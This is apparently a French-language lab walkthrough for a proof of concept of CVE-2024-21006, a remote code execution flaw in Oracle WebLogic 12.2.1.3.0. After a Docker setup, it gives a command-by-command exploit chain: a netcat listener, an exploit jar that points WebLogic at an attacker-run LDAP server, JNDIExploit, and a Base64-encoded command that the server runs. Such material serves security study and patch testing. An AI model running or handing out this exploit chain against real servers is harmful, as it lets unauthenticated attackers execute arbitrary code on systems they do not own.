
Exécution de code à distance (RCE) - Oracle WebLogic 12.2.1.3.0
La CVE-2024-21006 est une vulnérabilité critique d'exécution de code à distance (RCE) affectant Oracle WebLogic Server. La faille est liée à l'utilisation non sécurisée du protocole IIOP (Internet Inter-ORB Protocol) et de JNDI (Java Naming and Directory Interface), permettant à un attaquant distant non authentifié d'exécuter du code arbitraire sur le serveur affecté via une référence JNDI malveillante.
Montez l'environnement :
docker-compose up -d
Pour accéder au shell Kali :
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
Pour accéder au shell WebLogic :
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
Pour accéder au shell ExploitBox :
docker exec -it exploitbox /bin/bash
À cette étape, nous avons une instance de WebLogic 12.2.1.3.0 s'exécutant localement : http://127.0.0.1:7001/console/login/LoginForm.jsp

Sur Kali :
nc -vnlp 1389
Sur ExploitBox :
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 ldap://<IP do Kali>:1389
Notez que Kali a reçu la connexion provenant de WebLogic :

Sur Kali, démarrez JNDIExploit :
cd /exploit
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <IP do Kali>

Sur ExploitBox, exécutez l'exploit :
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 "ldap://<IP do Kali>:1389/Basic/Command/Base64/<Comando em Base64>"

Sur Kali, notez que nous avons reçu la requête :

Sur WebLogic, notez que la commande a été exécutée et que le fichier a été créé avec succès :
